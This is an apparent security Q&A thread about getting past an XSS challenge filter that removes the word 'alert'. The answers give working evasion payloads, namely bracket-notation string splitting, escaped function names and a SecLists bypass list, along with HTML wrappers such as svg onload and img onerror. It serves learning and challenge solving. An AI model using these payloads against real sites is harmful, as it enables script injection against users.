# Popup alert even when a site deletes the alert function?

Tags: xss, javascript

A website fully filter the alert function from his website, and replace it with an empty string, but I want to bypass it and still popup an alert, I am trying to solve an XSS challenge, and I figure out that the site identify the double `l` char, and fully removes the string.

`http://alertmywebsite.com/2.php?xss=<script>allert(1)</script>`

the output is `<script>allert(1)</script>`, and when I remove the second `l`, the output is `<script></script>`. Only the `l` is still showing the `alert` function. Any other double char is fully removes the string. How can I bypass it?

Comment: I assume you have to use `alert`? That wouldn't be a useful payload unless the challenge requires it.

Comment: So it blocks function calls, not script tags. Have you tried some other functions? Perhaps eval() is accessible? And [atob()](https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/atob)? This is essentially what security contests are often about. Learn as much as you can about the system, and piece together some attack (or security strategy).

Comment: filtering the DOM like this wouldn't be much protection... there's JSFuck for instance... or just injecting an event handler or call after the filter runs.

Answer (score 6, accepted):

The `alert` function is actually a property of the global `window` object. As such, you can access it using bracket notation. If the string `alert` is blocked, you can break it up into multiple parts. Try this payload:

```
window["al" + "ert"](1)
```

Comment: Thanks, but, In my opinion it is a method and not a property.

Comment: @nake Can't it be both? Anyways, please let me know if it works, I get curious! :-)

Comment: Don't know if it worked, because I did a real-time test when my university upload a site on their LAN and I had to hack it, but I'm sure it works (;

Comment: It does work: you can pop it into the console if in doubt.  Effectively all javascript methods can be accessed like this, but I had forgotten that fact and was trying to come up with much more complicated methods involving eval and octal character representations...

Answer (score 3):

For blacklist based filters, there are quite common fuzzer lists available.
Here's an extract of *seclists/Fuzzing/XSS/XSS-Bypass-Strings-BruteLogic.txt* (Source https://github.com/danielmiessler/SecLists)

```
alert`1`
alert&lpar;1&rpar;
alert&#x28;1&#x29
alert&#40;1&#41
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top['al\x65rt'](1)
top[8680439..toString(30)](1)
...
```

If you *merge* each PAYLOAD with different kinds of wrappers tags (see examples below), you get an attack with many combinations:

```
<script>PAYLOAD</script>
<img src="PAYLOAD"/>
<iframe src="PAYLOAD"/>
<svg onload="PAYLOAD"/>
<body onload="PAYLOAD">
<html ontouchstart="PAYLOAD">
<object data="javascript:PAYLOAD">
<img src=1 onerror="PAYLOAD">
```

From a server administration perspective, it is difficult to include all those possibilities in a server side *blacklist*, especially if the logic around the blacklist just tries to replace and eliminate certain *words*.
There's a good chance that one of the possibilities mentioned above works.